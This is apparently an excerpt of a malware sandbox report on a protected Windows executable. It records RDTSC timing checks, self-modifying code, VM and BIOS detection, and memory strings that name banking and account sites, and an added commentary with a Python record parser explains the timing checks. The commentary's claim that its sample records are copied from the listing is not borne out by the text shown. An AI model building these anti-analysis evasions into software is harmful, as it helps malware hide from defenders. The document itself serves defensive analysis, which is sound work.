    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460530 second address: 5460534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460534 second address: 5460551 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0BACBDA3DCh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov bh, 83h 0x0000000c popad 0x0000000d mov dword ptr [esp], ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460551 second address: 5460557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546059F second address: 54605CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6F7788D4h 0x00000008 mov al, bl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, eax 0x0000000f pushad 0x00000010 mov ah, 36h 0x00000012 movsx edi, ax 0x00000015 popad 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0BACBDA3E0h 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54605CB second address: 54605CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54605CF second address: 54605D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54605D5 second address: 5450C92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0C1DE68204h 0x0000000f xor eax, eax 0x00000011 jmp 00007F0BACBB38CAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e xor ebx, ebx 0x00000020 cmp eax, 00000000h 0x00000023 je 00007F0BACBDA333h 0x00000029 call 00007F0BB135CB05h 0x0000002e mov edi, edi 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F0BACBDA1A3h 0x00000037 add esi, 0FEDBCBEh 0x0000003d jmp 00007F0BACBDA1A9h 0x00000042 popfd 0x00000043 popad 0x00000044 xchg eax, ebp 0x00000045 pushad 0x00000046 mov di, ax 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007F0BACBDA1A6h 0x00000050 add ch, FFFFFFE8h 0x00000053 jmp 00007F0BACBDA19Bh 0x00000058 popfd 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450C92 second address: 5450CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F0BACBDA3DFh 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CAF second address: 5450CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CB3 second address: 5450CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CB7 second address: 5450CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CBD second address: 5450CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CC3 second address: 5450CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450CC7 second address: 5450D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0BACBDA3E0h 0x00000012 xchg eax, ecx 0x00000013 jmp 00007F0BACBDA3E0h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450D0B second address: 5450D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5450D11 second address: 5450D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA3E2h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460996 second address: 546099A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546099A second address: 54609DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0BACBDA3E6h 0x0000000c add eax, 36A31D78h 0x00000012 jmp 00007F0BACBDA3DBh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F0BACBDA3DBh 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460AB5 second address: 5460AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460AB9 second address: 5460ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460ABF second address: 5460B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F0C1DE5F237h 0x0000000e push 766E2B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [76744538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 mov bl, 40h 0x00000058 pushfd 0x00000059 jmp 00007F0BACBDA1A6h 0x0000005e and ax, 3078h 0x00000063 jmp 00007F0BACBDA19Bh 0x00000068 popfd 0x00000069 popad 0x0000006a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460B83 second address: 5460B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460B87 second address: 5460B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460B8D second address: 5460BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BACBDA3DCh 0x00000008 call 00007F0BACBDA3E2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 cmp dword ptr [ebp+08h], 00002000h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0BACBDA3DCh 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470B22 second address: 5470B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470B28 second address: 5470B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470B2C second address: 5470B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov cx, 2139h 0x0000000e mov di, si 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0BACBDA19Eh 0x0000001c adc eax, 69912348h 0x00000022 jmp 00007F0BACBDA19Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F0BACBDA1A8h 0x0000002e jmp 00007F0BACBDA1A5h 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a movsx edi, si 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470B9D second address: 5470BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470BA2 second address: 5470C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov bx, 2020h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jmp 00007F0BACBDA1A4h 0x00000013 mov dword ptr [esp], esi 0x00000016 pushad 0x00000017 mov cx, 01BDh 0x0000001b popad 0x0000001c mov esi, dword ptr [ebp+0Ch] 0x0000001f jmp 00007F0BACBDA1A4h 0x00000024 test esi, esi 0x00000026 jmp 00007F0BACBDA1A0h 0x0000002b je 00007F0C1DE47957h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov al, dh 0x00000036 call 00007F0BACBDA1A6h 0x0000003b pop eax 0x0000003c popad 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470C19 second address: 5470C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470C1F second address: 5470C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470CEF second address: 5470CFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470CFE second address: 5470D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D04 second address: 5470D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D08 second address: 5470D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D17 second address: 5470D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D1B second address: 5470D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D21 second address: 5470D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0BACBDA3E0h 0x00000009 or al, FFFFFFF8h 0x0000000c jmp 00007F0BACBDA3DBh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D81 second address: 5470D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470D87 second address: 5470D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
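Each interceptor record above is one window of execution between two consecutive RDTSC reads: the sandbox traps the first read, records what runs until the next one, and reports both addresses. Read as a set, the records show a timing check of the kind the Oreans protector family uses (the Oreans.vxd and Software\WinLicense strings appear further down in this section): a delta is taken across a handful of junk instructions, so any emulator or hypervisor that traps RDTSC inflates the difference. The reader below is an added example written for this report; it is not Joe Sandbox code and not code from the sample. It parses six records copied verbatim from the listing, reports how many instructions sit between the two reads, checks whether the second RDTSC is reachable by straight-line execution (when it is not, a jmp inside the window redirected execution; the 00007F0B... targets rendered by the sandbox disassembler are not in the 0x546xxxx address space, so the example does not try to resolve them), separates padding from payload, and reports where consecutive records stop being contiguous. The helper names and the PADDING set are this example's own choices.

```python
"""Reader for Joe Sandbox "RDTSC instruction interceptor" records.

Added example for this report; not Joe Sandbox code and not code from the
sample. The six SAMPLE records are copied verbatim from the listing above;
every helper name here (RdtscWindow, parse_records, chain_breaks, summarize)
and the PADDING set are this example's own choices.
"""
import re
from dataclasses import dataclass, field

# Constructed input: six interceptor records from the report, unchanged
# (the report fuses the file name and the record label, so the parser
# anchors on the label rather than on the start of the line).
SAMPLE = r"""
Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54601B8 second address: 54601EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, 00000000h 0x0000000f jmp 00007F0BACBDA19Ah 0x00000014 inc ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0BACBDA1A7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54601EB second address: 5460237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F0BACBDA3DEh 0x00000010 je 00007F0BACBDA5E3h 0x00000016 jmp 00007F0BACBDA3E0h 0x0000001b lea ecx, dword ptr [ebp-14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460237 second address: 546023B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546023B second address: 5460241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460241 second address: 5460250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA19Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602BA second address: 54602C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
"""

RECORD_RE = re.compile(
    r"RDTSC instruction interceptor: First address: (?P<first>[0-9A-Fa-f]+)"
    r" second address: (?P<second>[0-9A-Fa-f]+) instructions: (?P<body>.+)$"
)
# One disassembled instruction: an 8-hex-digit offset, then its text up to
# the next offset (immediates in the listing use an 'h' suffix, never 0x).
INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8}) (.*?)(?= 0x[0-9A-Fa-f]{8} |\Z)")

# Opcodes the protector uses as filler between the two RDTSC reads.
PADDING = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "jmp", "nop"}


@dataclass
class RdtscWindow:
    first: int                                  # address of the first RDTSC
    second: int                                 # address of the next RDTSC seen
    insns: list = field(default_factory=list)   # [(offset, text), ...]

    def is_timing_pair(self) -> bool:
        """Window opens and closes with RDTSC: a delta-measurement pair."""
        return bool(self.insns) and self.insns[0][1] == "rdtsc" and self.insns[-1][1] == "rdtsc"

    def is_straight_line(self) -> bool:
        """True when the second RDTSC sits at first + offset of the last
        instruction, i.e. nothing in the window redirected execution."""
        return self.first + self.insns[-1][0] == self.second

    def payload(self) -> list:
        """Instructions that are neither RDTSC nor obvious padding."""
        return [t for _, t in self.insns
                if t != "rdtsc" and t.split()[0] not in PADDING]


def parse_records(text: str) -> list:
    """Turn interceptor lines into RdtscWindow objects, in listing order."""
    windows = []
    for line in text.splitlines():
        m = RECORD_RE.search(line)
        if not m:
            continue
        insns = [(int(off, 16), body.strip()) for off, body in INSN_RE.findall(m["body"])]
        windows.append(RdtscWindow(int(m["first"], 16), int(m["second"], 16), insns))
    return windows


def chain_breaks(windows: list) -> list:
    """(prev.second, next.first) pairs where consecutive records are not
    contiguous: the next RDTSC was reached through code the listing does
    not show as part of a window."""
    return [(a.second, b.first) for a, b in zip(windows, windows[1:]) if a.second != b.first]


def summarize(windows: list) -> dict:
    if not windows:
        return {"records": 0}
    counts = [len(w.insns) for w in windows]
    return {
        "records": len(windows),
        "timing_pairs": sum(w.is_timing_pair() for w in windows),
        "straight_line": sum(w.is_straight_line() for w in windows),
        "min_insns": min(counts),
        "max_insns": max(counts),
        "breaks": chain_breaks(windows),
    }


if __name__ == "__main__":
    ws = parse_records(SAMPLE)
    for w in ws:
        print(f"{w.first:08X}->{w.second:08X} {len(w.insns):2d} insns "
              f"straight={w.is_straight_line()} payload={w.payload()}")
    print(summarize(ws))
```

On the six sample records three windows are straight-line (those starting at 5460237, 546023B and 54602BA), the longest holds 16 instructions, and the only payload that is not register shuffling is the test/je/lea sequence in the window starting at 54601EB, which is the protected program's own logic threaded between timing reads. The one chain break in the sample (5460250 to 54602BA) is partly an artifact of copying six records; the full listing has several real gaps, for example 5460152 to 54601B8 and 5460290 to 54602BA.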
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe Special instruction interceptor: First address: CF5ECE instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe Special instruction interceptor: First address: CF5F22 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe Special instruction interceptor: First address: E95C27 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe Special instruction interceptor: First address: F19434 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe TID: 3520 Thread sleep time: -38019s >= -30000s
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe TID: 4552 Thread sleep time: -210000s >= -30000s
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1228878328.0000000000E6F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
    Source: Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000002.1229503900.0000000001467000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.984015002.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.924032519.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.973978536.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.973120667.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
    Source: Qyk8RJnGN7.exe, 00000000.00000002.1228878328.0000000000E6F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Qyk8RJnGN7.exe, 00000000.00000003.940500470.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
